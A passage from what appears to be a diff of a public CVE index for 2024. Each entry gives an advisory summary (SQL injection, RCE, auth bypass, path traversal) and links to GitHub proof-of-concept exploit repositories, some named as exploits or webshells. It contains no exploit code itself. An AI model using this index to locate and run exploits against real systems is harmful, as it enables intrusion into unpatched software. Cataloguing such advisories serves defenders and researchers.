are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [p33d/CVE-2024-43363](https://github.com/p33d/CVE-2024-43363) + +### CVE-2024-43416 (2024-11-18) + +GLPI is a free asset and IT management software package. Starting in version 0.80 and prior to version 10.0.17, an unauthenticated user can use an application endpoint to check if an email address corresponds to a valid GLPI user. Version 10.0.17 fixes the issue. + + +- [0xmupa/CVE-2024-43416-PoC](https://github.com/0xmupa/CVE-2024-43416-PoC) + +### CVE-2024-43425 (2024-11-07) + +A flaw was found in Moodle. Additional restrictions are required to avoid a remote code execution risk in calculated question types. Note: This requires the capability to add/update questions. + + +- [RedTeamPentesting/moodle-rce-calculatedquestions](https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions) + +### CVE-2024-43532 (2024-10-08) + +Remote Registry Service Elevation of Privilege Vulnerability + + +- [expl0itsecurity/CVE-2024-43532](https://github.com/expl0itsecurity/CVE-2024-43532) + +### CVE-2024-43917 (2024-08-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TemplateInvaders TI WooCommerce Wishlist allows SQL Injection.This issue affects TI WooCommerce Wishlist: from n/a through 2.8.2. + + +- [p33d/CVE-2024-43917](https://github.com/p33d/CVE-2024-43917) + +### CVE-2024-43918 (2024-08-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WBW WBW Product Table PRO allows SQL Injection.This issue affects WBW Product Table PRO: from n/a through 1.9.4. + + +- [KTN1990/CVE-2024-43918](https://github.com/KTN1990/CVE-2024-43918) + +### CVE-2024-43919 (2024-11-01) + +Access Control vulnerability in YARPP YARPP allows .\n\nThis issue affects YARPP: from n/a through 5.30.10. + + +- [RandomRobbieBF/CVE-2024-43919](https://github.com/RandomRobbieBF/CVE-2024-43919) + +### CVE-2024-43965 (2024-08-29) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smackcoders SendGrid for WordPress allows SQL Injection.This issue affects SendGrid for WordPress: from n/a through 1.4. + + +- [RandomRobbieBF/CVE-2024-43965](https://github.com/RandomRobbieBF/CVE-2024-43965) + +### CVE-2024-43998 (2024-11-01) + +Missing Authorization vulnerability in WebsiteinWP Blogpoet allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Blogpoet: from n/a through 1.0.3. + + +- [RandomRobbieBF/CVE-2024-43998](https://github.com/RandomRobbieBF/CVE-2024-43998) + +### CVE-2024-44000 (2024-10-20) + +Insufficiently Protected Credentials vulnerability in LiteSpeed Technologies LiteSpeed Cache allows Authentication Bypass.This issue affects LiteSpeed Cache: from n/a before 6.5.0.1. + + +- [absholi7ly/CVE-2024-44000-LiteSpeed-Cache](https://github.com/absholi7ly/CVE-2024-44000-LiteSpeed-Cache) +- [gbrsh/CVE-2024-44000](https://github.com/gbrsh/CVE-2024-44000) +- [ifqygazhar/CVE-2024-44000-LiteSpeed-Cache](https://github.com/ifqygazhar/CVE-2024-44000-LiteSpeed-Cache) +- [geniuszly/CVE-2024-44000](https://github.com/geniuszly/CVE-2024-44000) + +### CVE-2024-44083 (2024-08-19) + +ida64.dll in Hex-Rays IDA Pro through 8.4 crashes when there is a section that has many jumps linked, and the final jump corresponds to the payload from where the actual entry point will be invoked. NOTE: in many use cases, this is an inconvenience but not a security issue. + + +- [Azvanzed/CVE-2024-44083](https://github.com/Azvanzed/CVE-2024-44083) + +### CVE-2024-44193 (2024-10-02) + +A logic issue was addressed with improved restrictions. This issue is fixed in iTunes 12.13.3 for Windows. A local attacker may be able to elevate their privileges. + + +- [mbog14/CVE-2024-44193](https://github.com/mbog14/CVE-2024-44193) + +### CVE-2024-44258 (2024-10-28) + +This issue was addressed with improved handling of symlinks. This issue is fixed in iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1, visionOS 2.1, tvOS 18.1. Restoring a maliciously crafted backup file may lead to modification of protected system files. + + +- [ifpdz/CVE-2024-44258](https://github.com/ifpdz/CVE-2024-44258) + +### CVE-2024-44285 (2024-10-28) + +A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 18.1 and iPadOS 18.1, watchOS 11.1, visionOS 2.1, tvOS 18.1. An app may be able to cause unexpected system termination or corrupt kernel memory. + + +- [slds1/explt](https://github.com/slds1/explt) + +### CVE-2024-44337 (2024-10-15) + +The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering as HTML. Prior to pseudoversion `v0.0.0-20240729232818-a2a9c4f`, which corresponds with commit `a2a9c4f76ef5a5c32108e36f7c47f8d310322252`, there was a logical problem in the paragraph function of the parser/block.go file, which allowed a remote attacker to cause a denial of service (DoS) condition by providing a tailor-made input that caused an infinite loop, causing the program to hang and consume resources indefinitely. Submit `a2a9c4f76ef5a5c32108e36f7c47f8d310322252` contains fixes to this problem. + + +- [Brinmon/CVE-2024-44337](https://github.com/Brinmon/CVE-2024-44337) + +### CVE-2024-44346 +- [Shauryae1337/CVE-2024-44346](https://github.com/Shauryae1337/CVE-2024-44346) +- [sahil3276/CVE-2024-44346](https://github.com/sahil3276/CVE-2024-44346) + +### CVE-2024-44349 (2024-10-08) + +A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB. + + +- [AndreaF17/PoC-CVE-2024-44349](https://github.com/AndreaF17/PoC-CVE-2024-44349) + +### CVE-2024-44450 (2025-01-07) + +Multiple functions are vulnerable to Authorization Bypass in AIMS eCrew. The issue was fixed in version JUN23 #190. + + +- [VoidSecOrg/CVE-2024-44450](https://github.com/VoidSecOrg/CVE-2024-44450) + +### CVE-2024-44541 (2024-09-11) + +evilnapsis Inventio Lite Versions v4 and before is vulnerable to SQL Injection via the "username" parameter in "/?action=processlogin." + + +- [pointedsec/CVE-2024-44541](https://github.com/pointedsec/CVE-2024-44541) + +### CVE-2024-44542 (2024-09-18) + +SQL Injection vulnerability in todesk v.1.1 allows a remote attacker to execute arbitrary code via the /todesk.com/news.html parameter. + + +- [alphandbelt/CVE-2024-44542](https://github.com/alphandbelt/CVE-2024-44542) + +### CVE-2024-44610 (2024-10-01) + +PCAN-Ethernet Gateway FD before 1.3.0 and PCAN-Ethernet Gateway before 2.11.0 are vulnerable to Command injection via shell metacharacters in a Software Update to processing.php. + + +- [BertoldVdb/PcanExploit](https://github.com/BertoldVdb/PcanExploit) + +### CVE-2024-44623 (2024-09-16) + +An issue in TuomoKu SPx-GC v.1.3.0 and before allows a remote attacker to execute arbitrary code via the child_process.js function. + + +- [merbinr/CVE-2024-44623](https://github.com/merbinr/CVE-2024-44623) + +### CVE-2024-44625 (2024-11-15) + +Gogs <=0.13.0 is vulnerable to Directory Traversal via the editFilePost function of internal/route/repo/editor.go. + + +- [Fysac/CVE-2024-44625](https://github.com/Fysac/CVE-2024-44625) + +### CVE-2024-44765 (2024-11-08) + +An Improper Authorization (Access Control Misconfiguration) vulnerability in MGT-COMMERCE GmbH CloudPanel v2.0.0 to v2.4.2 allows low-privilege users to bypass access controls and gain unauthorized access to sensitive configuration files and administrative functionality. + + +- [josephgodwinkimani/cloudpanel-2.4.2-CVE-2024-44765-recovery](https://github.com/josephgodwinkimani/cloudpanel-2.4.2-CVE-2024-44765-recovery) + +### CVE-2024-44812 (2024-10-22) + +SQL Injection vulnerability in Online Complaint Site v.1.0 allows a remote attacker to escalate privileges via the username and password parameters in the /admin.index.php component. + + +- [b1u3st0rm/CVE-2024-44812-PoC](https://github.com/b1u3st0rm/CVE-2024-44812-PoC) + +### CVE-2024-44815 (2024-09-10) + +Vulnerability in Hathway Skyworth Router CM5100 v.4.1.1.24 allows a physically proximate attacker to obtain user credentials via SPI flash Firmware W25Q64JV. + + +- [nitinronge91/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-](https://github.com/nitinronge91/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-) + +### CVE-2024-44849 (2024-09-09) + +Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php. + + +- [extencil/CVE-2024-44849](https://github.com/extencil/CVE-2024-44849) + +### CVE-2024-44867 (2024-09-10) + +phpok v3.0 was discovered to contain an arbitrary file read vulnerability via the component /autoload/file.php. + + +- [ChengZyin/CVE-2024-44867](https://github.com/ChengZyin/CVE-2024-44867) + +### CVE-2024-44902 (2024-09-09) + +A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code. + + +- [fru1ts/CVE-2024-44902](https://github.com/fru1ts/CVE-2024-44902) + +### CVE-2024-44946 (2024-08-31) + +In the Linux kernel, the following vulnerability has been resolved:\n\nkcm: Serialise kcm_sendmsg() for the same socket.\n\nsyzkaller reported UAF in kcm_release(). [0]\n\nThe scenario is\n\n 1. Thread A builds a skb with MSG_MORE and sets kcm->seq_skb.\n\n 2. Thread A resumes building skb from kcm->seq_skb but is blocked\n by sk_stream_wait_memory()\n\n 3. Thread B calls sendmsg() concurrently, finishes building kcm->seq_skb\n and puts the skb to the write queue\n\n 4. Thread A faces an error and finally frees skb that is already in the\n write queue\n\n 5. kcm_release() does double-free the skb in the write queue\n\nWhen a thread is building a MSG_MORE skb, another thread must not touch it.\n\nLet's add a per-sk mutex and serialise kcm_sendmsg().\n\n[0]:\nBUG: KASAN: slab-use-after-free in __skb_unlink include/linux/skbuff.h:2366 [inline]\nBUG: KASAN: slab-use-after-free in __skb_dequeue include/linux/skbuff.h:2385 [inline]\nBUG: KASAN: slab-use-after-free in __skb_queue_purge_reason include/linux/skbuff.h:3175 [inline]\nBUG: KASAN: slab-use-after-free in __skb_queue_purge include/linux/skbuff.h:3181 [inline]\nBUG: KASAN: slab-use-after-free in kcm_release+0x170/0x4c8 net/kcm/kcmsock.c:1691\nRead of size 8 at addr ffff0000ced0fc80 by task syz-executor329/6167\n\nCPU: 1 PID: 6167 Comm: syz-executor329 Tainted: G B 6.8.0-rc5-syzkaller-g9abbc24128bc #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024\nCall trace:\n dump_backtrace+0x1b8/0x1e4 arch/arm64/kernel/stacktrace.c:291\n show_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:298\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd0/0x124 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0x178/0x518 mm/kasan/report.c:488\n kasan_report+0xd8/0x138 mm/kasan/report.c:601\n __asan_report_load8_noabort+0x20/0x2c mm/kasan/report_generic.c:381\n __skb_unlink include/linux/skbuff.h:2366 [inline]\n __skb_dequeue include/linux/skbuff.h:2385 [inline]\n __skb_queue_purge_reason include/linux/skbuff.h:3175 [inline]\n __skb_queue_purge include/linux/skbuff.h:3181 [inline]\n kcm_release+0x170/0x4c8 net/kcm/kcmsock.c:1691\n __sock_release net/socket.c:659 [inline]\n sock_close+0xa4/0x1e8 net/socket.c:1421\n __fput+0x30c/0x738 fs/file_table.c:376\n ____fput+0x20/0x30 fs/file_table.c:404\n task_work_run+0x230/0x2e0 kernel/task_work.c:180\n exit_task_work include/linux/task_work.h:38 [inline]\n do_exit+0x618/0x1f64 kernel/exit.c:871\n do_group_exit+0x194/0x22c kernel/exit.c:1020\n get_signal+0x1500/0x15ec kernel/signal.c:2893\n do_signal+0x23c/0x3b44 arch/arm64/kernel/signal.c:1249\n do_notify_resume+0x74/0x1f4 arch/arm64/kernel/entry-common.c:148\n exit_to_user_mode_prepare arch/arm64/kernel/entry-common.c:169 [inline]\n exit_to_user_mode arch/arm64/kernel/entry-common.c:178 [inline]\n el0_svc+0xac/0x168 arch/arm64/kernel/entry-common.c:713\n el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:730\n el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:598\n\nAllocated by task 6166:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x40/0x78 mm/kasan/common.c:68\n kasan_save_alloc_info+0x70/0x84 mm/kasan/generic.c:626\n unpoison_slab_object mm/kasan/common.c:314 [inline]\n __kasan_slab_alloc+0x74/0x8c mm/kasan/common.c:340\n kasan_slab_alloc include/linux/kasan.h:201 [inline]\n slab_post_alloc_hook mm/slub.c:3813 [inline]\n slab_alloc_node mm/slub.c:3860 [inline]\n kmem_cache_alloc_node+0x204/0x4c0 mm/slub.c:3903\n __alloc_skb+0x19c/0x3d8 net/core/skbuff.c:641\n alloc_skb include/linux/skbuff.h:1296 [inline]\n kcm_sendmsg+0x1d3c/0x2124 net/kcm/kcmsock.c:783\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n sock_sendmsg+0x220/0x2c0 net/socket.c:768\n splice_to_socket+0x7cc/0xd58 fs/splice.c:889\n do_splice_from fs/splice.c:941 [inline]\n direct_splice_actor+0xec/0x1d8 fs/splice.c:1164\n splice_direct_to_actor+0x438/0xa0c fs/splice.c:1108\n do_splice_direct_actor \n---truncated--- + + +- [Abdurahmon3236/CVE-2024-44946](https://github.com/Abdurahmon3236/CVE-2024-44946) + +### CVE-2024-44947 (2024-09-02) + +In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: Initialize beyond-EOF page contents before setting uptodate\n\nfuse_notify_store(), unlike fuse_do_readpage(), does not enable page\nzeroing (because it can be used to change partial page contents).\n\nSo fuse_notify_store() must be more careful to fully initialize page\ncontents (including parts of the page that are beyond end-of-file)\nbefore marking the page uptodate.\n\nThe current code can leave beyond-EOF page contents uninitialized, which\nmakes these uninitialized page contents visible to userspace via mmap().\n\nThis is an information leak, but only affects systems which do not\nenable init-on-alloc (via CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y or the\ncorresponding kernel command line parameter). + + +- [Abdurahmon3236/CVE-2024-44947](https://github.com/Abdurahmon3236/CVE-2024-44947) + +### CVE-2024-45058 (2024-08-28) + +i-Educar is free, fully online school management software that can be used by school secretaries, teachers, coordinators, and area managers. Prior to the 2.9 branch, an attacker with only minimal viewing privileges in the settings section is able to change their user type to Administrator (or another type with super-permissions) through a specifically crafted POST request to `/intranet/educar_usuario_cad.php`, modifying the `nivel_usuario_` parameter. The vulnerability occurs in the file located at `ieducar/intranet/educar_usuario_cad.php`, which does not check the user's current permission level before allowing changes. Commit c25910cdf11ab50e50162a49dd44bef544422b6e contains a patch for the issue. + + +- [0xbhsu/CVE-2024-45058](https://github.com/0xbhsu/CVE-2024-45058) + +### CVE-2024-45200 (2024-09-30) + +In Nintendo Mario Kart 8 Deluxe before 3.0.3, the LAN/LDN local multiplayer implementation allows a remote attacker to exploit a stack-based buffer overflow upon deserialization of session information via a malformed browse-reply packet, aka KartLANPwn. The victim is not required to join a game session with an attacker. The victim must open the "Wireless Play" (or "LAN Play") menu from the game's title screen, and an attacker nearby (LDN) or on the same LAN network as the victim can send a crafted reply packet to the victim's console. This enables a remote attacker to obtain complete denial-of-service on the game's process, or potentially, remote code execution on the victim's console. The issue is caused by incorrect use of the Nintendo Pia library, + + +- [latte-soft/kartlanpwn](https://github.com/latte-soft/kartlanpwn) + +### CVE-2024-45216 (2024-10-16) + +Improper Authentication vulnerability in Apache Solr.\n\nSolr instances using the PKIAuthenticationPlugin, which is enabled by default when Solr Authentication is used, are vulnerable to Authentication bypass.\nA fake ending at the end of any Solr API URL path, will allow requests to skip Authentication while maintaining the API contract with the original URL Path.\nThis fake ending looks like an unprotected API path, however it is stripped off internally after authentication but before API routing.\n\n\nThis issue affects Apache Solr: from 5.3.0 before 8.11.4, from 9.0.0 before 9.7.0.\n\nUsers are recommended to upgrade to version 9.7.0, or 8.11.4, which fix the issue. + + +- [congdong007/CVE-2024-45216-Poc](https://github.com/congdong007/CVE-2024-45216-Poc) + +### CVE-2024-45241 (2024-08-26) + +A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information. + + +- [d4lyw/CVE-2024-45241](https://github.com/d4lyw/CVE-2024-45241) +- [verylazytech/CVE-2024-45241](https://github.com/verylazytech/CVE-2024-45241) + +### CVE-2024-45244 (2024-08-25) + +Hyperledger Fabric through 2.5.9 does not verify that a request has a timestamp within the expected time window. + + +- [shanker-sec/HLF_TxTime_spoofing](https://github.com/shanker-sec/HLF_TxTime_spoofing) +- [shanker-sec/hlf-time-oracle](https://github.com/shanker-sec/hlf-time-oracle) + +### CVE-2024-45264 (2024-08-27) + +A cross-site request forgery (CSRF) vulnerability in the admin panel in SkySystem Arfa-CMS before 5.1.3124 allows remote attackers to add a new administrator, leading to escalation of privileges. + + +- [TheHermione/CVE-2024-45264](https://github.com/TheHermione/CVE-2024-45264) + +### CVE-2024-45265 (2024-08-26) + +A SQL injection vulnerability in the poll component in SkySystem Arfa-CMS before 5.1.3124 allows remote attackers to execute arbitrary SQL commands via the psid parameter. + + +- [TheHermione/CVE-2024-45265](https://github.com/TheHermione/CVE-2024-45265) + +### CVE-2024-45337 (2024-12-11) + +Applications and libraries which misuse the ServerConfig.PublicKeyCallback callback may be susceptible to an authorization bypass. The documentation for ServerConfig.PublicKeyCallback says that "A call to this function does not guarantee that the key offered is in fact used to authenticate." Specifically, the SSH protocol allows clients to inquire about whether a public key is acceptable before proving control of the corresponding private key. PublicKeyCallback may be called with multiple keys, and the order in which the keys were provided cannot be used to infer which key the client successfully authenticated with, if any. Some applications, which store the key(s) passed to PublicKeyCallback (or derived information) and make security relevant determinations based on it once the connection is established, may make incorrect assumptions. For example, an attacker may send public keys A and B, and then authenticate with A. PublicKeyCallback would be called only twice, first with A and then with B. A vulnerable application may then make authorization decisions based on key B for which the attacker does not actually control the private key. Since this API is widely misused, as a partial mitigation golang.org/x/cry...@v0.31.0 enforces the property that, when successfully authenticating via public key, the last key passed to ServerConfig.PublicKeyCallback will be the key used to authenticate the connection. PublicKeyCallback will now be called multiple times with the same key, if necessary. Note that the client may still not control the last key passed to PublicKeyCallback if the connection is then authenticated with a different method, such as PasswordCallback, KeyboardInteractiveCallback, or NoClientAuth. Users should be using the Extensions field of the Permissions return value from the various authentication callbacks to record data associated with the authentication attempt instead of referencing external state. Once the connection is established the state corresponding to the successful authentication attempt can be retrieved via the ServerConn.Permissions field. Note that some third-party libraries misuse the Permissions type by sharing it across authentication attempts; users of third-party libraries should refer to the relevant projects for guidance. + + +- [NHAS/CVE-2024-45337-POC](https://github.com/NHAS/CVE-2024-45337-POC) +- [NHAS/VULNERABLE-CVE-2024-45337](https://github.com/NHAS/VULNERABLE-CVE-2024-45337) + +### CVE-2024-45383 (2024-09-12) + +A mishandling of IRP requests vulnerability exists in the HDAudBus_DMA interface of Microsoft High Definition Audio Bus Driver 10.0.19041.3636 (WinBuild.160101.0800). A specially crafted application can issue multiple IRP Complete requests which leads to a local denial-of-service. An attacker can execute malicious script/application to trigger this vulnerability. + + +- [SpiralBL0CK/CVE-2024-45383](https://github.com/SpiralBL0CK/CVE-2024-45383) + +### CVE-2024-45409 (2024-09-10) + +The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. This vulnerability is fixed in 1.17.0 and 1.12.3. + + +- [synacktiv/CVE-2024-45409](https://github.com/synacktiv/CVE-2024-45409) + +### CVE-2024-45410 (2024-09-19) + +Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [jphetphoumy/traefik-CVE-2024-45410-poc](https://github.com/jphetphoumy/traefik-CVE-2024-45410-poc) + +### CVE-2024-45436 (2024-08-29) + +extractFromZipFile in model.go in Ollama before 0.1.47 can extract members of a ZIP archive outside of the parent directory. + + +- [pankass/CVE-2024-45436](https://github.com/pankass/CVE-2024-45436) +- [XiaomingX/cve-2024-45436-exp](https://github.com/XiaomingX/cve-2024-45436-exp) + +### CVE-2024-45440 (2024-08-29) + +core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist. + + +- [w0r1i0g1ht/CVE-2024-45440](https://github.com/w0r1i0g1ht/CVE-2024-45440) + +### CVE-2024-45492 (2024-08-30) + +An issue was discovered in libexpat before 2.6.3. nextScaffoldPart in xmlparse.c can have an integer overflow for m_groupSize on 32-bit platforms (where UINT_MAX equals SIZE_MAX). + + +- [nidhihcl75/external_expat_2.6.2_CVE-2024-45492](https://github.com/nidhihcl75/external_expat_2.6.2_CVE-2024-45492) + +### CVE-2024-45507 (2024-09-04) + +Server-Side Request Forgery (SSRF), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: before 18.12.16.\n\nUsers are recommended to upgrade to version 18.12.16, which fixes the issue. + + +- [Avento/CVE-2024-45507_Behinder_Webshell](https://github.com/Avento/CVE-2024-45507_Behinder_Webshell) + +### CVE-2024-45519 (2024-10-02) + +The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands. + + +- [p33d/CVE-2024-45519](https://github.com/p33d/CVE-2024-45519) +- [Chocapikk/CVE-2024-45519](https://github.com/Chocapikk/CVE-2024-45519) +- [whiterose7777/CVE-2024-45519](https://github.com/whiterose7777/CVE-2024-45519) +- [XiaomingX/cve-2024-45519-poc](https://github.com/XiaomingX/cve-2024-45519-poc) + +### CVE-2024-45589 (2024-09-05) + +RapidIdentity LTS through 2023.0.2 and Cloud through 2024.08.0 improperly restricts excessive authentication attempts and allows a remote attacker to cause a denial of service via the username parameters. + + +- [BenRogozinski/CVE-2024-45589](https://github.com/BenRogozinski/CVE-2024-45589) + +### CVE-2024-45614 (2024-09-19) + +Puma is a Ruby/Rack web server built for parallelism. In affected versions clients could clobber values set by intermediate proxies (such as X-Forwarded-For) by providing a underscore version of the same header (X-Forwarded_For). Any users relying on proxy set variables is affected. v6.4.3/v5.6.9 now discards any headers using underscores if the non-underscore version also exists. Effectively, allowing the proxy defined headers to always win. Users are advised to upgrade. Nginx has a underscores_in_headers configuration variable to discard these headers at the proxy level as a mitigation. Any users that are implicitly trusting the proxy defined headers for security should immediately cease doing so until upgraded to the fixed versions. + + +- [ooooooo-q/puma_header_normalization-CVE-2024-45614](https://github.com/ooooooo-q/puma_header_normalization-CVE-2024-45614) + +### CVE-2024-46209 (2025-01-06) + +A stored cross-site scripting (XSS) vulnerability in the component /media/test.html of REDAXO CMS v5.17.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the password parameter. + + +- [h4ckr4v3n/CVE-2024-46209](https://github.com/h4ckr4v3n/CVE-2024-46209) + +### CVE-2024-46256 (2024-09-27) + +A Command injection vulnerability in requestLetsEncryptSsl in NginxProxyManager 2.11.3 allows an attacker to RCE via Add Let's Encrypt Certificate. + + +- [barttran2k/POC_CVE-2024-46256](https://github.com/barttran2k/POC_CVE-2024-46256) + +### CVE-2024-46278 (2024-10-07) + +Teedy 1.11 is vulnerable to Cross Site Scripting (XSS) via the management console. + + +- [ayato-shitomi/CVE-2024-46278-teedy_1.11_account-takeover](https://github.com/ayato-shitomi/CVE-2024-46278-teedy_1.11_account-takeover) + +### CVE-2024-46310 +- [PRX5Y/CVE-2024-46310](https://github.com/PRX5Y/CVE-2024-46310) + +### CVE-2024-46377 (2024-09-18) + +Best House Rental Management System 1.0 contains an arbitrary file upload vulnerability in the save_settings() function of the file rental/admin_class.php. + + +- [vidura2/CVE-2024-46377](https://github.com/vidura2/CVE-2024-46377) + +### CVE-2024-46383 (2024-11-15) + +Hathway Skyworth Router CM5100-511 v4.1.1.24 was discovered to store sensitive information about USB and Wifi connected devices in plaintext. + + +- [nitinronge91/Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383](https://github.com/nitinronge91/Sensitive-Information-disclosure-via-SPI-flash-firmware-for-Hathway-router-CVE-2024-46383) + +### CVE-2024-46451 (2024-09-16) + +TOTOLINK AC1200 T8 v4.1.5cu.861_B20230220 has a buffer overflow vulnerability in the setWiFiAclRules function via the desc parameter. + + +- [vidura2/CVE-2024-46451](https://github.com/vidura2/CVE-2024-46451) + +### CVE-2024-46483 (2024-10-22) + +Xlight FTP Server <3.9.4.3 has an integer overflow vulnerability in the packet parsing logic of the SFTP server, which can lead to a heap overflow with attacker-controlled content. + + +- [kn32/cve-2024-46483](https://github.com/kn32/cve-2024-46483) + +### CVE-2024-46532 (2024-10-11) + +SQL Injection vulnerability in OpenHIS v.1.0 allows an attacker to execute arbitrary code via the refund function in the PayController.class.php component. + + +- [KamenRiderDarker/CVE-2024-46532](https://github.com/KamenRiderDarker/CVE-2024-46532) + +### CVE-2024-46538 (2024-10-22) + +A cross-site scripting (XSS) vulnerability in pfsense v2.5.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the $pconfig variable at interfaces_groups_edit.php. + + +- [EQSTLab/CVE-2024-46538](https://github.com/EQSTLab/CVE-2024-46538) +- [LauLeysen/CVE-2024-46538](https://github.com/LauLeysen/CVE-2024-46538) + +### CVE-2024-46542 (2024-12-30) + +Veritas / Arctera Data Insight before 7.1.1 allows Application Administrators to conduct SQL injection attacks. + + +- [MarioTesoro/CVE-2024-46542](https://github.com/MarioTesoro/CVE-2024-46542) + +### CVE-2024-46627 (2024-09-26) + +Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests. + + +- [d4lyw/CVE-2024-46627](https://github.com/d4lyw/CVE-2024-46627) + +### CVE-2024-46635 (2024-09-30) + +An issue in the API endpoint /AccountMaster/GetCurrentUserInfo of INROAD before v202402060 allows attackers to access sensitive information via a crafted payload to the UserNameOrPhoneNumber parameter. + + +- [h1thub/CVE-2024-46635](https://github.com/h1thub/CVE-2024-46635) + +### CVE-2024-46658 (2024-10-03) + +Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 was discovered to contain an authenticated command injection vulnerability. + + +- [jackalkarlos/CVE-2024-46658](https://github.com/jackalkarlos/CVE-2024-46658) + +### CVE-2024-46901 (2024-12-09) + +Insufficient validation of filenames against control characters in Apache Subversion repositories served via mod_dav_svn allows authenticated users with commit access to commit a corrupted revision, leading to disruption for users of the repository.\n\nAll versions of Subversion up to and including Subversion 1.14.4 are affected if serving repositories via mod_dav_svn. Users are recommended to upgrade to version 1.14.5, which fixes this issue.\n\nRepositories served via other access methods are not affected. + + +- [devhaozi/CVE-2024-46901](https://github.com/devhaozi/CVE-2024-46901) + +### CVE-2024-46982 (2024-09-17) + +Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version. + + +- [CodePontiff/next_js_poisoning](https://github.com/CodePontiff/next_js_poisoning) + +### CVE-2024-46986 (2024-09-18) + +Camaleon CMS is a dynamic and advanced content management system based on Ruby on Rails. An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a delayed remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application. This issue has been addressed in release version 2.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [vidura2/CVE-2024-46986](https://github.com/vidura2/CVE-2024-46986) + +### CVE-2024-47062 (2024-09-20) + +Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [saisathvik1/CVE-2024-47062](https://github.com/saisathvik1/CVE-2024-47062) + +### CVE-2024-47066 (2024-09-23) + +Lobe Chat is an open-source artificial intelligence chat framework. Prior to version 1.19.13, server-side request forgery protection 